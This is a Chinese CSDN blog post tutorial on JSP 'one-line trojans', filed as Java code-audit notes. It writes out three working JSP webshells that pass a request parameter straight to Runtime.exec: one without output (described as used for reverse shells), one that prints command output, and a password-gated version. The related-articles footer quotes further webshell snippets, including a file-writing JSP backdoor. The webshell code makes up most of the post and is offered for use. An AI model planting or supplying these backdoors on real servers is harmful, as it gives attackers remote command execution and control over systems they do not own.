java安全——jsp一句话木马

最新推荐文章于 2024-07-22 14:34:27 发布
最新推荐文章于 2024-07-22 14:34:27 发布
阅读量1.2w 收藏 7
点赞数 1
分类专栏: java代码审计笔记 文章标签: java 安全 servlet
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46317063/article/details/128816033
版权

jsp回显一句话木马

文章目录

提示:以下是本篇文章正文内容,下面案例可供参考

一、搭建web服务

1、创建空白maven项目,搭建本地tomcat

在这里插入图片描述

在这里插入图片描述

2、引入servlet的pom依赖

在这里插入图片描述

二、无回显一句话

 <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

http://localhost:8003/index.jsp?cmd=whoami
不会回显执行的结果只能在后台打印一个地址,常用来反弹shell
在这里插入图片描述

三、带回显一句话

代码如下(示例):

  <%
    Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
    InputStream inputStream = process.getInputStream();
    BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
    String line;
    while ((line = bufferedReader.readLine()) != null){
      response.getWriter().println(line);
    }
  %>

在这里插入图片描述

三、有密码带回显一句话

  <%
    if ("password".equals(request.getParameter("pass"))){
      Process process = Runtime.getRuntime().exec(request.getParameter("cmd"));
//    System.out.println(process);
      InputStream inputStream = process.getInputStream();
      BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
      String line;
      while ((line = bufferedReader.readLine()) != null){
        response.getWriter().println(line);
      }
    }
  %>

在这里插入图片描述

ju_ju_bone
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
vulstrack——第一周
qq_45920291的博客
09-18 249
地址为:http://10.203.87.107/ 最先扫描了端口信息 PORT service 21/tcp ftp 22/tcp ssh 80/tcp http 111/tcp rpcbind 888/tcp accessbuilder 3306/tcp mysql 8888/tcp sun-answerbook宝塔面板 可以看到是thinkphp V5版本 查看http://10.203.87.107/robots.txt 根据版本,搜索了ThinkPHP
安全技术系列之Java一句话木马
好记性不如烂笔头
10-14 4374
安全技术系列文章
一句话木马JSP
09-21 8820
JSP一句话收集: <%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%> ...
内存马检测排查手段_内存马查杀
最新发布
2401_84215240的博客
07-22 1605
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
jsp一句话木马
ditanji3425的博客
05-08 1187
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> <%!String Pwd = "pass"; String EC(String s, String c) throws Exception { return s; }//n...
java jsp 木马_一句话木马JSP
weixin_39986435的博客
12-21 1291
String EC(String s, String c) throws Exception {returns;}//new String(s.getBytes("ISO-8859-1"),c);}Connection GC(String s) throws Exception {String[] x= s.trim().split("\r\n");Class.forName(x[0].trim(...
Java利用技巧——通过反射实现webshell编译文件的自删除
HongYu012的博客
03-11 459
0x00 前言 我们知道,当我们访问jsp文件时,Java环境会先将jsp文件转换成.class字节码文件,再由Java虚拟机进行加载,这导致了Java服务器上会生成对应名称的.class字节码文件。对于webshell,这会留下痕迹。 为了实现自删除.class字节码文件,我们可以通过反射获得.class字节码文件的路径,再进行删除。本文将以Zimbra环境为例,结合AntSword-JSP-Template,分析利用思路。 0x01 简介 本文将要介绍以下内容: 通过反射实现...
WEB渗透学习笔记7——webshell及上传绕过
林林木林林L的博客
08-01 3336
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编的webshell上传到web服务器的页面的目录下,攻击者通过上传WebShell获得Web服
WEB漏洞——文件上传
qq_63594215的博客
04-09 1216
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
jsp小后门
Jiajia2017的博客
12-18 1067
转自  http://zone.wooyun.org/content/17356  园长 一:执行系统命令:无回显执行系统命令:<%Runtime.getRuntime().exec(request.getParameter("i"));%>请求:http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls执行之后不会有任何回显,...
java 一句话木马
weixin_42611177的博客
01-11 727
Java 一句话木马是一种在 Java 环境中执行恶意代码的攻击方式。通常,攻击者会在一段 Java 代码中插入恶意代码,并将其嵌入到 Java 类文件中。当用户下载并运行该 Java 类文件时,恶意代码就会被执行,从而对用户计算机造成威胁。 ...
JSP一句话木马
热门推荐
我的
12-11 2万+
JSP一句话木马  2011-01-13 21:39:42|  分类: 网络技巧 |  标签:jsp  木马  |字号大中小 订阅 1》jsp页面代码 if(req[wiki]UE[/wiki]st.getParameter("f")!=null)(new java.io.FileOutputStream(application.get
tomcat put方法任意文件漏洞
weixin_48739941的博客
04-21 2884
(1)cd vulhub/tomcat/CVE-2017-12615 切换目录。 (2) docker-compose up -d 启动。 (3)访问:http://192.168.43.137:8080/ (4)burpsuite抓包。 (5)send to repeater,修改为PUT /l3yx.txt。 (6) docker exec -it 3e7 bash ; cd webapps/ ;cd ROOT ;cat l3yx.txt进入容器,查看。 ...
Java遇见HTML——JSP篇之商品浏览记录的实现
06-09
好的,让我来回答你的问题。 实现商品浏览记录可以通过使用JSPJava Server Pages)来完成。首先,我们需要在数据库中创建一个用于存储浏览记录的表。表中需要包含以下字段:用户ID、商品ID、浏览时间。 然后,在浏览商品的页面中,我们可以使用JavaScript来获取当前用户浏览的商品ID,并将其发送到后台。后台可以使用JSP来处理请求,将用户ID、商品ID、浏览时间存储到数据库中。 在用户再次访问商品页面时,我们可以使用JSP从数据库中获取该用户的浏览记录,并将其展示在页面上。 需要注意的是,为了保护用户隐私,我们需要对用户ID进行加密处理,以避免敏感信息被泄露。 以上就是使用JSP实现商品浏览记录的一个简单方法。希望能对你有所帮助!
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值